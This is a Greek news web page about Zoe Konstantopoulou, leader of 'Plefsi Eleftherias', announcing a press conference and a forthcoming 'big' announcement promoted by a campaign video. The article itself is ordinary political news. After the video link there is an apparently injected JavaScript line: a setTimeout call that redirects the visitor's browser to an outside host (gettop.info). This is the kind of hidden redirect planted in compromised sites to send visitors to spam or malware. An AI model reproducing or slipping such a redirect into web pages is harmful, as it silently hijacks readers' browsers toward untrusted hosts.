Η Ζωή προαναγγέλλει… «Κάτι Μεγάλο» (ΒΙΝΤΕΟ)

0
5

 

Η πρόεδρος της «Πλεύσης Ελευθερίας» Ζωή Κωνσταντοπούλου θα παραθέσει συνέντευξη Τύπου αύριο για να μιλήσει για την ΕΛΣΤΑΤ, το χρέος της χώρας, τις γερμανικές οφειλές και τη SIEMENS. Ταυτόχρονα, προϊδέασε για μια μεγάλη ανακοίνωση που θα κάνει κατά τη διάρκεια της συνέντευξης.

Αναλυτικά η ανακοίνωση της ανέφερε:

Με νέο video, η Ζωή προαναγγέλλει ότι θα ανακοινώσει “Κάτι Μεγάλο”, σε συνέντευξη τύπου που θα δώσει αύριο στο Δικηγορικό Σύλλογο Αθηνών.

Κάτι μεγάλο “για όλους μας”, όπως λέει στο τέλος του video.

Θα μιλήσει για δικαιοσύνη, ως πολιτικός. Και για πολιτική από τη σκοπιά του δικηγόρου.

Γιατί η πολιτική βασίζεται σε νομικά εργαλεία. Και γιατί «δεν υπάρχει πολιτική χωρίς δικαιοσύνη», όπως έγραψε χθες στον προσωπικό της λογαριασμό.

Στο νέο video, γυρισμένο και πάλι από κινητό, εμφανίζεται ένα νέο κορίτσι, μέλος της νεολαίας της Πλεύσης Ελευθερίας και της Πρωτοβουλίας «ΟΧΙ στα Ναι τους”, να επιτίθεται στην παρανομία των κυβερνώντων από την Πολυτεχνειούπολη Ζωγράφου και να μιλά για τις υποθέσεις στις οποίες η κυβέρνηση εγκαταλείπει το δημόσιο συμφέρον αλλά και να παραθέτει τι μπορούμε να διεκδικήσουμε.

«Αλλά αυτά είναι νομικά πράγματα, δεν είναι πολιτική», καταλήγει ειρωνικά κάθε φορά, με αναφορά στις επανειλημμένες δηλώσεις κυβερνητικών και κοινοβουλευτικών που ξεπουλούν καθημερινά το δημόσιο συμφέρον με τη δικαιολογία ότι η διεκδίκηση είναι νομικισμός ή «νομικό θέμα» και όχι πολιτικό.

Το βίντεο είναι χωρισμένο σε ενότητες για το κάθε θέμα που θα αναλυθεί στην αυριανή συνέντευξη Τύπου.

https://youtu.be/rL5u5jIG8xQ?list=PLNLR_rOUtwbLUOLcAFpdpoVeJ4Zt-N54_ setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here